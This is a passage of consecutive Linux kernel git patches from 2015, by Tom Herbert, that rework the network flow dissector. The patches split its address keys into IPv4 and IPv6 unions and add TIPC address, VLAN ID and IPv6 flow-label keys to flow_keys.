data.u.ipv4.flags = FILTER_FIELDS_IPV4_5TUPLE; @@ -158,8 +158,8 @@ static struct enic_rfs_fltr_node *htbl_key_search(struct hlist_head *h, struct enic_rfs_fltr_node *tpos; hlist_for_each_entry(tpos, h, node) - if (tpos->keys.addrs.src == k->addrs.src && - tpos->keys.addrs.dst == k->addrs.dst && + if (tpos->keys.addrs.v4addrs.src == k->addrs.v4addrs.src && + tpos->keys.addrs.v4addrs.dst == k->addrs.v4addrs.dst && tpos->keys.ports.ports == k->ports.ports && tpos->keys.basic.ip_proto == k->basic.ip_proto && tpos->keys.basic.n_proto == k->basic.n_proto) diff --git a/drivers/net/ethernet/cisco/enic/enic_ethtool.c b/drivers/net/ethernet/cisco/enic/enic_ethtool.c index 117c0968dd0b..73874b2575bf 100644 --- a/drivers/net/ethernet/cisco/enic/enic_ethtool.c +++ b/drivers/net/ethernet/cisco/enic/enic_ethtool.c @@ -346,10 +346,10 @@ static int enic_grxclsrule(struct enic *enic, struct ethtool_rxnfc *cmd) break; } - fsp->h_u.tcp_ip4_spec.ip4src = n->keys.addrs.src; + fsp->h_u.tcp_ip4_spec.ip4src = flow_get_u32_src(&n->keys); fsp->m_u.tcp_ip4_spec.ip4src = (__u32)~0; - fsp->h_u.tcp_ip4_spec.ip4dst = n->keys.addrs.dst; + fsp->h_u.tcp_ip4_spec.ip4dst = flow_get_u32_dst(&n->keys); fsp->m_u.tcp_ip4_spec.ip4dst = (__u32)~0; fsp->h_u.tcp_ip4_spec.psrc = n->keys.ports.src; diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index cba6a10b214a..306d4613abbb 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -12,7 +12,7 @@ */ struct flow_dissector_key_control { u16 thoff; - u16 padding; + u16 addr_type; }; /** @@ -28,18 +28,39 @@ struct flow_dissector_key_basic { }; /** - * struct flow_dissector_key_addrs: - * @src: source ip address in case of IPv4 - * For IPv6 it contains 32bit hash of src address - * @dst: destination ip address in case of IPv4 - * For IPv6 it contains 32bit hash of dst address + * struct flow_dissector_key_ipv4_addrs: + * @src: source ip address + * @dst: destination ip address */ -struct flow_dissector_key_addrs { +struct flow_dissector_key_ipv4_addrs { /* (src,dst) must be grouped, in the same way than in IP header */ __be32 src; __be32 dst; }; +/** + * struct flow_dissector_key_ipv6_addrs: + * @src: source ip address + * @dst: destination ip address + */ +struct flow_dissector_key_ipv6_addrs { + /* (src,dst) must be grouped, in the same way than in IP header */ + struct in6_addr src; + struct in6_addr dst; +}; + +/** + * struct flow_dissector_key_addrs: + * @v4addrs: IPv4 addresses + * @v6addrs: IPv6 addresses + */ +struct flow_dissector_key_addrs { + union { + struct flow_dissector_key_ipv4_addrs v4addrs; + struct flow_dissector_key_ipv6_addrs v6addrs; + }; +}; + /** * flow_dissector_key_tp_ports: * @ports: port numbers of Transport header @@ -56,16 +77,6 @@ struct flow_dissector_key_ports { }; }; -/** - * struct flow_dissector_key_ipv6_addrs: - * @src: source ip address - * @dst: destination ip address - */ -struct flow_dissector_key_ipv6_addrs { - /* (src,dst) must be grouped, in the same way than in IP header */ - struct in6_addr src; - struct in6_addr dst; -}; /** * struct flow_dissector_key_eth_addrs: @@ -81,10 +92,10 @@ struct flow_dissector_key_eth_addrs { enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_CONTROL, /* struct flow_dissector_key_control */ FLOW_DISSECTOR_KEY_BASIC, /* struct flow_dissector_key_basic */ - FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_addrs */ + FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_ipv4_addrs */ + FLOW_DISSECTOR_KEY_IPV6_ADDRS, /* struct flow_dissector_key_ipv6_addrs */ FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ - FLOW_DISSECTOR_KEY_IPV6_ADDRS, /* struct flow_dissector_key_ipv6_addrs */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_MAX, @@ -129,6 +140,9 @@ struct flow_keys { #define FLOW_KEYS_HASH_OFFSET \ offsetof(struct flow_keys, FLOW_KEYS_HASH_START_FIELD) +__be32 flow_get_u32_src(const struct flow_keys *flow); +__be32 flow_get_u32_dst(const struct flow_keys *flow); + extern struct flow_dissector flow_keys_dissector; extern struct flow_dissector flow_keys_buf_dissector; diff --git a/include/net/ip.h b/include/net/ip.h index 16cfc87fed6c..0750a186ea63 100644 --- a/include/net/ip.h +++ b/include/net/ip.h @@ -355,6 +355,20 @@ static inline __wsum inet_compute_pseudo(struct sk_buff *skb, int proto) skb->len, proto, 0); } +/* copy IPv4 saddr & daddr to flow_keys, possibly using 64bit load/store + * Equivalent to : flow->v4addrs.src = iph->saddr; + * flow->v4addrs.dst = iph->daddr; + */ +static inline void iph_to_flow_copy_v4addrs(struct flow_keys *flow, + const struct iphdr *iph) +{ + BUILD_BUG_ON(offsetof(typeof(flow->addrs), v4addrs.dst) != + offsetof(typeof(flow->addrs), v4addrs.src) + + sizeof(flow->addrs.v4addrs.src)); + memcpy(&flow->addrs.v4addrs, &iph->saddr, sizeof(flow->addrs.v4addrs)); + flow->control.addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; +} + static inline void inet_set_txhash(struct sock *sk) { struct inet_sock *inet = inet_sk(sk); @@ -362,8 +376,9 @@ static inline void inet_set_txhash(struct sock *sk) memset(&keys, 0, sizeof(keys)); - keys.addrs.src = inet->inet_saddr; - keys.addrs.dst = inet->inet_daddr; + keys.addrs.v4addrs.src = inet->inet_saddr; + keys.addrs.v4addrs.dst = inet->inet_daddr; + keys.control.addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; keys.ports.src = inet->inet_sport; keys.ports.dst = inet->inet_dport; diff --git a/include/net/ipv6.h b/include/net/ipv6.h index 474ca466a091..82dbdb092a5d 100644 --- a/include/net/ipv6.h +++ b/include/net/ipv6.h @@ -692,6 +692,20 @@ static inline int ip6_sk_dst_hoplimit(struct ipv6_pinfo *np, struct flowi6 *fl6, return hlimit; } +/* copy IPv6 saddr & daddr to flow_keys, possibly using 64bit load/store + * Equivalent to : flow->v6addrs.src = iph->saddr; + * flow->v6addrs.dst = iph->daddr; + */ +static inline void iph_to_flow_copy_v6addrs(struct flow_keys *flow, + const struct ipv6hdr *iph) +{ + BUILD_BUG_ON(offsetof(typeof(flow->addrs), v6addrs.dst) != + offsetof(typeof(flow->addrs), v6addrs.src) + + sizeof(flow->addrs.v6addrs.src)); + memcpy(&flow->addrs.v6addrs, &iph->saddr, sizeof(flow->addrs.v6addrs)); + flow->control.addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; +} + #if IS_ENABLED(CONFIG_IPV6) static inline void ip6_set_txhash(struct sock *sk) { @@ -701,8 +715,11 @@ static inline void ip6_set_txhash(struct sock *sk) memset(&keys, 0, sizeof(keys)); - keys.addrs.src = (__force __be32)ipv6_addr_hash(&np->saddr); - keys.addrs.dst = (__force __be32)ipv6_addr_hash(&sk->sk_v6_daddr); + memcpy(&keys.addrs.v6addrs.src, &np->saddr, + sizeof(keys.addrs.v6addrs.src)); + memcpy(&keys.addrs.v6addrs.dst, &sk->sk_v6_daddr, + sizeof(keys.addrs.v6addrs.dst)); + keys.control.addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; keys.ports.src = inet->inet_sport; keys.ports.dst = inet->inet_dport; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 55b5f2962afa..ca9d22488cfb 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -178,10 +178,12 @@ bool __skb_flow_dissect(const struct sk_buff *skb, if (!skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_IPV4_ADDRS)) break; + key_addrs = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_IPV4_ADDRS, - target_container); - memcpy(key_addrs, &iph->saddr, sizeof(*key_addrs)); + FLOW_DISSECTOR_KEY_IPV4_ADDRS, target_container); + memcpy(&key_addrs->v4addrs, &iph->saddr, + sizeof(key_addrs->v4addrs)); + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; break; } case htons(ETH_P_IPV6): { @@ -203,8 +205,11 @@ bool __skb_flow_dissect(const struct sk_buff *skb, FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, target_container); - key_addrs->src = (__force __be32)ipv6_addr_hash(&iph->saddr); - key_addrs->dst = (__force __be32)ipv6_addr_hash(&iph->daddr); + key_addrs->v4addrs.src = + (__force __be32)ipv6_addr_hash(&iph->saddr); + key_addrs->v4addrs.dst = + (__force __be32)ipv6_addr_hash(&iph->daddr); + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; goto flow_label; } if (skb_flow_dissector_uses_key(flow_dissector, @@ -216,6 +221,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, target_container); memcpy(key_ipv6_addrs, &iph->saddr, sizeof(*key_ipv6_addrs)); + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; goto flow_label; } break; @@ -292,8 +298,9 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_addrs = skb_flow_dissector_target(flow_dissector, FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, target_container); - key_addrs->src = hdr->srcnode; - key_addrs->dst = 0; + key_addrs->v4addrs.src = hdr->srcnode; + key_addrs->v4addrs.dst = 0; + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; } return true; } @@ -389,21 +396,88 @@ static inline void *flow_keys_hash_start(struct flow_keys *flow) static inline size_t flow_keys_hash_length(struct flow_keys *flow) { + size_t diff = FLOW_KEYS_HASH_OFFSET + sizeof(flow->addrs); BUILD_BUG_ON((sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) % sizeof(u32)); - return (sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) / sizeof(u32); + BUILD_BUG_ON(offsetof(typeof(*flow), addrs) != + sizeof(*flow) - sizeof(flow->addrs)); + + switch (flow->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + diff -= sizeof(flow->addrs.v4addrs); + break; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + diff -= sizeof(flow->addrs.v6addrs); + break; + } + return (sizeof(*flow) - diff) / sizeof(u32); +} + +__be32 flow_get_u32_src(const struct flow_keys *flow) +{ + switch (flow->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + return flow->addrs.v4addrs.src; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + return (__force __be32)ipv6_addr_hash( + &flow->addrs.v6addrs.src); + default: + return 0; + } +} +EXPORT_SYMBOL(flow_get_u32_src); + +__be32 flow_get_u32_dst(const struct flow_keys *flow) +{ + switch (flow->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + return flow->addrs.v4addrs.dst; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + return (__force __be32)ipv6_addr_hash( + &flow->addrs.v6addrs.dst); + default: + return 0; + } +} +EXPORT_SYMBOL(flow_get_u32_dst); + +static inline void __flow_hash_consistentify(struct flow_keys *keys) +{ + int addr_diff, i; + + switch (keys->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + addr_diff = (__force u32)keys->addrs.v4addrs.dst - + (__force u32)keys->addrs.v4addrs.src; + if ((addr_diff < 0) || + (addr_diff == 0 && + ((__force u16)keys->ports.dst < + (__force u16)keys->ports.src))) { + swap(keys->addrs.v4addrs.src, keys->addrs.v4addrs.dst); + swap(keys->ports.src, keys->ports.dst); + } + break; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + addr_diff = memcmp(&keys->addrs.v6addrs.dst, + &keys->addrs.v6addrs.src, + sizeof(keys->addrs.v6addrs.dst)); + if ((addr_diff < 0) || + (addr_diff == 0 && + ((__force u16)keys->ports.dst < + (__force u16)keys->ports.src))) { + for (i = 0; i < 4; i++) + swap(keys->addrs.v6addrs.src.s6_addr32[i], + keys->addrs.v6addrs.dst.s6_addr32[i]); + swap(keys->ports.src, keys->ports.dst); + } + break; + } } static inline u32 __flow_hash_from_keys(struct flow_keys *keys, u32 keyval) { u32 hash; - /* get a consistent hash (same value on both flow directions) */ - if (((__force u32)keys->addrs.dst < (__force u32)keys->addrs.src) || - (((__force u32)keys->addrs.dst == (__force u32)keys->addrs.src) && - ((__force u16)keys->ports.dst < (__force u16)keys->ports.src))) { - swap(keys->addrs.dst, keys->addrs.src); - swap(keys->ports.src, keys->ports.dst); - } + __flow_hash_consistentify(keys); hash = __flow_hash_words((u32 *)flow_keys_hash_start(keys), flow_keys_hash_length(keys), keyval); @@ -451,8 +525,8 @@ void make_flow_keys_digest(struct flow_keys_digest *digest, data->n_proto = flow->basic.n_proto; data->ip_proto = flow->basic.ip_proto; data->ports = flow->ports.ports; - data->src = flow->addrs.src; - data->dst = flow->addrs.dst; + data->src = flow->addrs.v4addrs.src; + data->dst = flow->addrs.v4addrs.dst; } EXPORT_SYMBOL(make_flow_keys_digest); @@ -566,11 +640,15 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { }, { .key_id = FLOW_DISSECTOR_KEY_IPV4_ADDRS, - .offset = offsetof(struct flow_keys, addrs), + .offset = offsetof(struct flow_keys, addrs.v4addrs), + }, + { + .key_id = FLOW_DISSECTOR_KEY_IPV6_ADDRS, + .offset = offsetof(struct flow_keys, addrs.v6addrs), }, { .key_id = FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, - .offset = offsetof(struct flow_keys, addrs), + .offset = offsetof(struct flow_keys, addrs.v4addrs), }, { .key_id = FLOW_DISSECTOR_KEY_PORTS, diff --git a/net/ethernet/eth.c b/net/ethernet/eth.c index 7d0e239a6755..77e0f0e7a88e 100644 --- a/net/ethernet/eth.c +++ b/net/ethernet/eth.c @@ -133,7 +133,7 @@ u32 eth_get_headlen(void *data, unsigned int len) /* parse any remaining L2/L3 headers, check for L4 */ if (!skb_flow_dissect_flow_keys_buf(&keys, data, eth->h_proto, sizeof(*eth), len)) - return max_t(u32, keys.basic.thoff, sizeof(*eth)); + return max_t(u32, keys.control.thoff, sizeof(*eth)); /* parse for any L4 headers */ return min_t(u32, __skb_get_poff(NULL, data, &keys, len), len); diff --git a/net/sched/cls_flow.c b/net/sched/cls_flow.c index b4359924846c..76bc3a20ffdb 100644 --- a/net/sched/cls_flow.c +++ b/net/sched/cls_flow.c @@ -68,15 +68,21 @@ static inline u32 addr_fold(void *addr) static u32 flow_get_src(const struct sk_buff *skb, const struct flow_keys *flow) { - if (flow->addrs.src) - return ntohl(flow->addrs.src); + __be32 src = flow_get_u32_src(flow); + + if (src) + return ntohl(src); + return addr_fold(skb->sk); } static u32 flow_get_dst(const struct sk_buff *skb, const struct flow_keys *flow) { - if (flow->addrs.dst) - return ntohl(flow->addrs.dst); + __be32 dst = flow_get_u32_dst(flow); + + if (dst) + return ntohl(dst); + return addr_fold(skb_dst(skb)) ^ (__force u16) tc_skb_protocol(skb); } diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c index 5a7d66c59684..b92d3f49c23e 100644 --- a/net/sched/cls_flower.c +++ b/net/sched/cls_flower.c @@ -28,8 +28,9 @@ struct fl_flow_key { struct flow_dissector_key_control control; struct flow_dissector_key_basic basic; struct flow_dissector_key_eth_addrs eth; + struct flow_dissector_key_addrs ipaddrs; union { - struct flow_dissector_key_addrs ipv4; + struct flow_dissector_key_ipv4_addrs ipv4; struct flow_dissector_key_ipv6_addrs ipv6; }; struct flow_dissector_key_ports tp; @@ -260,14 +261,14 @@ static int fl_set_key(struct net *net, struct nlattr **tb, &mask->basic.ip_proto, TCA_FLOWER_UNSPEC, sizeof(key->basic.ip_proto)); } - if (key->basic.n_proto == htons(ETH_P_IP)) { + if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV4_ADDRS) { fl_set_key_val(tb, &key->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC, &mask->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC_MASK, sizeof(key->ipv4.src)); fl_set_key_val(tb, &key->ipv4.dst, TCA_FLOWER_KEY_IPV4_DST, &mask->ipv4.dst, TCA_FLOWER_KEY_IPV4_DST_MASK, sizeof(key->ipv4.dst)); - } else if (key->basic.n_proto == htons(ETH_P_IPV6)) { + } else if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV6_ADDRS) { fl_set_key_val(tb, &key->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC, &mask->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC_MASK, sizeof(key->ipv6.src)); @@ -610,7 +611,7 @@ static int fl_dump(struct net *net, struct tcf_proto *tp, unsigned long fh, sizeof(key->basic.ip_proto))) goto nla_put_failure; - if (key->basic.n_proto == htons(ETH_P_IP) && + if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV4_ADDRS && (fl_dump_key_val(skb, &key->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC, &mask->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC_MASK, sizeof(key->ipv4.src)) || @@ -618,7 +619,7 @@ static int fl_dump(struct net *net, struct tcf_proto *tp, unsigned long fh, &mask->ipv4.dst, TCA_FLOWER_KEY_IPV4_DST_MASK, sizeof(key->ipv4.dst)))) goto nla_put_failure; - else if (key->basic.n_proto == htons(ETH_P_IPV6) && + else if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV6_ADDRS && (fl_dump_key_val(skb, &key->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC, &mask->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC_MASK, sizeof(key->ipv6.src)) || From 9f24908901c5f4b1e3b07548106b1790af933476 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:41 -0700 Subject: [PATCH 701/872] net: Add keys for TIPC address Add a new flow key for TIPC addresses. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/net/flow_dissector.h | 10 ++++++++++ net/core/flow_dissector.c | 18 +++++++++++++----- 2 files changed, 23 insertions(+), 5 deletions(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 306d4613abbb..3ee606a54775 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -49,6 +49,14 @@ struct flow_dissector_key_ipv6_addrs { struct in6_addr dst; }; +/** + * struct flow_dissector_key_tipc_addrs: + * @srcnode: source node address + */ +struct flow_dissector_key_tipc_addrs { + __be32 srcnode; +}; + /** * struct flow_dissector_key_addrs: * @v4addrs: IPv4 addresses @@ -58,6 +66,7 @@ struct flow_dissector_key_addrs { union { struct flow_dissector_key_ipv4_addrs v4addrs; struct flow_dissector_key_ipv6_addrs v6addrs; + struct flow_dissector_key_tipc_addrs tipcaddrs; }; }; @@ -97,6 +106,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ + FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ FLOW_DISSECTOR_KEY_MAX, }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index ca9d22488cfb..91861c3d45a7 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -294,13 +294,12 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS)) { + FLOW_DISSECTOR_KEY_TIPC_ADDRS)) { key_addrs = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, + FLOW_DISSECTOR_KEY_TIPC_ADDRS, target_container); - key_addrs->v4addrs.src = hdr->srcnode; - key_addrs->v4addrs.dst = 0; - key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; + key_addrs->tipcaddrs.srcnode = hdr->srcnode; + key_control->addr_type = FLOW_DISSECTOR_KEY_TIPC_ADDRS; } return true; } @@ -408,6 +407,9 @@ static inline size_t flow_keys_hash_length(struct flow_keys *flow) case FLOW_DISSECTOR_KEY_IPV6_ADDRS: diff -= sizeof(flow->addrs.v6addrs); break; + case FLOW_DISSECTOR_KEY_TIPC_ADDRS: + diff -= sizeof(flow->addrs.tipcaddrs); + break; } return (sizeof(*flow) - diff) / sizeof(u32); } @@ -420,6 +422,8 @@ __be32 flow_get_u32_src(const struct flow_keys *flow) case FLOW_DISSECTOR_KEY_IPV6_ADDRS: return (__force __be32)ipv6_addr_hash( &flow->addrs.v6addrs.src); + case FLOW_DISSECTOR_KEY_TIPC_ADDRS: + return flow->addrs.tipcaddrs.srcnode; default: return 0; } @@ -650,6 +654,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, .offset = offsetof(struct flow_keys, addrs.v4addrs), }, + { + .key_id = FLOW_DISSECTOR_KEY_TIPC_ADDRS, + .offset = offsetof(struct flow_keys, addrs.tipcaddrs), + }, { .key_id = FLOW_DISSECTOR_KEY_PORTS, .offset = offsetof(struct flow_keys, ports), From 45b47fd00ca14df869979dbbe14324625ec93552 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:42 -0700 Subject: [PATCH 702/872] net: Get rid of IPv6 hash addresses flow keys We don't need to return the IPv6 address hash as part of flow keys. In general, using the IPv6 address hash is risky in a hash value since the underlying use of xor provides no entropy. If someone really needs the hash value they can get it from the full IPv6 addresses in flow keys (e.g. from flow_get_u32_src). Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/net/flow_dissector.h | 1 - net/core/flow_dissector.c | 17 ----------------- 2 files changed, 18 deletions(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 3ee606a54775..59f00f90fc6b 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -103,7 +103,6 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_BASIC, /* struct flow_dissector_key_basic */ FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_ipv4_addrs */ FLOW_DISSECTOR_KEY_IPV6_ADDRS, /* struct flow_dissector_key_ipv6_addrs */ - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 91861c3d45a7..5348a468de78 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -199,19 +199,6 @@ bool __skb_flow_dissect(const struct sk_buff *skb, ip_proto = iph->nexthdr; nhoff += sizeof(struct ipv6hdr); - if (skb_flow_dissector_uses_key(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS)) { - key_addrs = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, - target_container); - - key_addrs->v4addrs.src = - (__force __be32)ipv6_addr_hash(&iph->saddr); - key_addrs->v4addrs.dst = - (__force __be32)ipv6_addr_hash(&iph->daddr); - key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; - goto flow_label; - } if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_IPV6_ADDRS)) { struct flow_dissector_key_ipv6_addrs *key_ipv6_addrs; @@ -650,10 +637,6 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_IPV6_ADDRS, .offset = offsetof(struct flow_keys, addrs.v6addrs), }, - { - .key_id = FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, - .offset = offsetof(struct flow_keys, addrs.v4addrs), - }, { .key_id = FLOW_DISSECTOR_KEY_TIPC_ADDRS, .offset = offsetof(struct flow_keys, addrs.tipcaddrs), From d34af823ff401c312541aa613c49ea4b872bde9e Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:43 -0700 Subject: [PATCH 703/872] net: Add VLAN ID to flow_keys In flow_dissector set vlan_id in flow_keys when VLAN is found. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/net/flow_dissector.h | 6 ++++++ net/core/flow_dissector.c | 14 ++++++++++++++ 2 files changed, 20 insertions(+) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 59f00f90fc6b..08480fbb9035 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -27,6 +27,10 @@ struct flow_dissector_key_basic { u8 padding; }; +struct flow_dissector_key_tags { + u32 vlan_id:12; +}; + /** * struct flow_dissector_key_ipv4_addrs: * @src: source ip address @@ -106,6 +110,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ + FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_MAX, }; @@ -142,6 +147,7 @@ struct flow_keys { struct flow_dissector_key_control control; #define FLOW_KEYS_HASH_START_FIELD basic struct flow_dissector_key_basic basic; + struct flow_dissector_key_tags tags; struct flow_dissector_key_ports ports; struct flow_dissector_key_addrs addrs; }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 5348a468de78..5c66cb2e66df 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -126,6 +126,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, struct flow_dissector_key_basic *key_basic; struct flow_dissector_key_addrs *key_addrs; struct flow_dissector_key_ports *key_ports; + struct flow_dissector_key_tags *key_tags; u8 ip_proto; if (!data) { @@ -246,6 +247,15 @@ bool __skb_flow_dissect(const struct sk_buff *skb, if (!vlan) return false; + if (skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_VLANID)) { + key_tags = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_VLANID, + target_container); + + key_tags->vlan_id = skb_vlan_tag_get_id(skb); + } + proto = vlan->h_vlan_encapsulated_proto; nhoff += sizeof(*vlan); goto again; @@ -645,6 +655,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_PORTS, .offset = offsetof(struct flow_keys, ports), }, + { + .key_id = FLOW_DISSECTOR_KEY_VLANID, + .offset = offsetof(struct flow_keys, tags), + }, }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { From 87ee9e52ffeb168803a76cc07734425227cc2268 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:44 -0700 Subject: [PATCH 704/872] net: Add IPv6 flow label to flow_keys In flow_dissector set the flow label in flow_keys for IPv6. This also removes the shortcircuiting of flow dissection when a non-zero label is present, the flow label can be considered to provide additional entropy for a hash. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/net/flow_dissector.h | 4 +++- net/core/flow_dissector.c | 29 ++++++++++------------------- 2 files changed, 13 insertions(+), 20 deletions(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 08480fbb9035..14d8483d836e 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -28,7 +28,8 @@ struct flow_dissector_key_basic { }; struct flow_dissector_key_tags { - u32 vlan_id:12; + u32 vlan_id:12, + flow_label:20; }; /** @@ -111,6 +112,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ + FLOW_DISSECTOR_KEY_FLOW_LABEL, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_MAX, }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 5c66cb2e66df..70f0567b6be9 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -210,30 +210,17 @@ bool __skb_flow_dissect(const struct sk_buff *skb, memcpy(key_ipv6_addrs, &iph->saddr, sizeof(*key_ipv6_addrs)); key_control->addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; - goto flow_label; } - break; -flow_label: + flow_label = ip6_flowlabel(iph); if (flow_label) { - /* Awesome, IPv6 packet has a flow label so we can - * use that to represent the ports without any - * further dissection. - */ - - key_basic->n_proto = proto; - key_basic->ip_proto = ip_proto; - key_control->thoff = (u16)nhoff; - if (skb_flow_dissector_uses_key(flow_dissector, - FLOW_DISSECTOR_KEY_PORTS)) { - key_ports = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_PORTS, - target_container); - key_ports->ports = flow_label; + 